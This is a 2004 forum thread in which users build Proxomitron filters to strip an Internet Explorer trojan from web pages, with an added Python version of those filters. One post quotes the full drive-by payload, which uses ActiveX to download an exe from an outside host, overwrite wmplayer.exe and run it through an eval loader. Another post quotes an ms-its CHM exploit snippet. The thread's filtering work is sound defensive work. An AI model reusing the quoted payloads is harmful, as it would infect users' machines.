Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
Posted: Wed Apr 07, 2004 1:25 pm Post subject: A filter to kill those MsXml Trojans
Be nice, it's my first attempt..
Code:
Name = "Kill ActiveX Trojan 1a"
Active = TRUE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = "<textarea id=*/textarea>"
Replace = "<!-- [Textarea Trojan Killed] -->"
Name = "Kill ActiveX Trojan 1b"
Active = TRUE
Multi = TRUE
URL = "$TYPE(htm)"
Limit = 4096
Match = "function preparecode*setTimeout"
Replace = "<!-- [ActiveX Trojan] -->"
1a kills a textarea with a code id that sets up the trojan download
1b kills the javascript that runs the damn thing..
By the way - how do I put " into a filter
Code:
Match = "<textarea id=*/textarea>"
should be
Match = "<textarea id="code"*/textarea>"
for safety.
Last edited by Fluffbutt on Tue Apr 13, 2004 10:35 am, edited 1 time in total
z12
Sergeant
Joined: Jul 17, 2002
Posts: 131
Location: USA
Posted: Fri Apr 09, 2004 7:45 pm Post subject:
Hi Fluffbutt,
I'm guessing you're referring to this: http://www.securityfocus.com/archive/1/...04-04-08/0
snippet:
Code:
<!-- VVZkV2RXSXpaeja1 -->
<textarea style='display:none;' id='code'>
<object
data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM
::/loi.htm" type="text/x-scriptlet"></object>
</textarea>
more info here: http://secunia.com/advisories/10523/
You might want to think about disabling any script or object code that has *.chm* or better yet, disable ActiveX for untrusted sites.
As for matching quotes in tags, probably your best bet is to use $AV() or $AVQ() depending on if you need to capture the quote marks.
Code:
<SomeTag *id=$AV(code)*>
This way, it doesn't matter if it's
id=code
id='code'
id="code"
Also, for html elements that have a start & end tag, like "object" for example, check out the $NEST() matching command. This is very useful, especially for matching table tags.
Code:
Bounds Match:$NEST(<object,</object>)
Matching Expression:*.chm*
Replacement Text:whatever
HTH
Mike
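The two filters from the first post, with the id attribute matched the way $AV(code) accepts it (id=code, id='code' and id="code" all match), rewritten as a small Python content filter you can run over a page. This is an added example, not code from the thread or from Proxomitron; the sample page is constructed and has the download/write payload removed, and $NEST() is not covered.

```python
import re

# Constructed sample modelled on the thread's snippet; the payload lines are
# replaced with a placeholder so only the structure the filters key on remains.
SAMPLE_HTML = """<html><body>
<textarea id='code' style='display:none;'>
PAYLOAD-REMOVED
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) { return code; }
function doit() { }
setTimeout("doit()", 5000);
</script>
</body></html>"""


def av(value: str) -> str:
    """Regex fragment for an attribute value written as value, 'value' or "value",
    mirroring what Proxomitron's $AV() accepts."""
    v = re.escape(value)
    return rf"""(?:"{v}"|'{v}'|{v}(?=[\s>/]))"""


# (name, pattern, replacement): filters 1a and 1b from the thread as Python regexes.
# Proxomitron's "*" becomes a non-greedy ".*?" that may span newlines (DOTALL).
FILTERS = [
    ("Kill ActiveX Trojan 1a",
     re.compile(r"<textarea\b[^>]*?(?<![\w-])id\s*=\s*" + av("code")
                + r"[^>]*>.*?</textarea\s*>", re.IGNORECASE | re.DOTALL),
     "<!-- [Textarea Trojan Killed] -->"),
    ("Kill ActiveX Trojan 1b",
     re.compile(r"function\s+preparecode\b.*?setTimeout", re.IGNORECASE | re.DOTALL),
     "<!-- [ActiveX Trojan] -->"),
]


def apply_filters(html: str):
    """Run every filter over the page; return (rewritten html, names of filters that fired)."""
    fired = []
    for name, pattern, replacement in FILTERS:
        html, count = pattern.subn(replacement, html)
        if count:
            fired.append(name)
    return html, fired


if __name__ == "__main__":
    cleaned, fired = apply_filters(SAMPLE_HTML)
    print("filters fired:", fired)
    print(cleaned)
```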
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
Posted: Sun Apr 11, 2004 5:37 am Post subject:
Actually I was referring to the reg33.exe virus from this code..
Code:
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line + '\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
Thanks for the info on the *id=$AV(code)*> bit, I'll try it.
The nest command won't work, the filter doesn't fire off at all with nest - I tried it earlier.
Blush!!! The reason I couldn't find the edit button was I went to the page, then logged on, then went to the page (which was still in my isp's cache server - I needed to do a 'force reload' )... sorry mate!!!
_________________
Meeow!
Last edited by Fluffbutt on Tue Apr 13, 2004 10:30 am, edited 2 times in total
LWC
Trooper
Joined: Feb 13, 2004
Posts: 27
Location: Israel
Posted: Sun Apr 11, 2004 11:46 am Post subject:
I've just been affected by that trojan too! Or at least something similar (in my case, I think it was "just" a spyware, but who knows...well, at least the mighty Ad Aware got rid of it).
Anyway, I've opened a topic recently about a more minor syndrome of said script trouble.
I've just added a new filter there that may solve your problem.
Check it out in:
http://www.computercops.biz/postp139489.html
P.S.
When you quote codes, ALWAYS use this forum's (actually, any forum's) "code" tag.
My filter (in the aforementioned URL) thought you were a hacker yourself and now this page is crippled...of course, if you're a nice guy, you'd edit your post and add said code tags, won't you?
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
Posted: Mon Apr 12, 2004 10:26 am Post subject:
LWC wrote:
...of course, if you're a nice guy, you'd edit your post and add said code tags, won't you?
Umm, yes I am, and I would, but there's no 'edit' button here on my page - short of reposting the entire thing again, what can I do?
LWC
Trooper
Joined: Feb 13, 2004
Posts: 27
Location: Israel
Posted: Mon Apr 12, 2004 12:44 pm Post subject:
Sure there is such a button. You just didn't notice it, I guess.
Note that it's a picture button so you can't look for the word "edit" and therefore must find it yourself.
You must be logged on, naturally, and then it's between the "quote" button and the "report" button (which is just a blue square, for some unknown reason) in the top right side of your post.
Oh, alright, I guess a picture is worth a thousand words...(i.e. look at the attachment).
[Attachment: image, 40.64 KB]
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
Posted: Tue Apr 13, 2004 10:43 am Post subject:
Lwc.. umm yup, sorry, see above for explanation.
<Fluffbutt runs off in shame and hides his tail....>
_________________
Meeow!
Fluffbutt
Cadet
Joined: Apr 07, 2004
Posts: 8
Location: Australia
Posted: Tue Apr 13, 2004 10:46 am Post subject:
Damn!! How did that happen..
Sorry for double posting.
_________________
Meeow!
Powered by phpBB 2.0.8a © 2001 phpBB Group
Version 2.0.6 of PHP-Nuke Port by Tom Nitzschner © 2002 www.toms-home.com
Version 2.2 by Paul Laudanski © 2003-2004 Computer Cops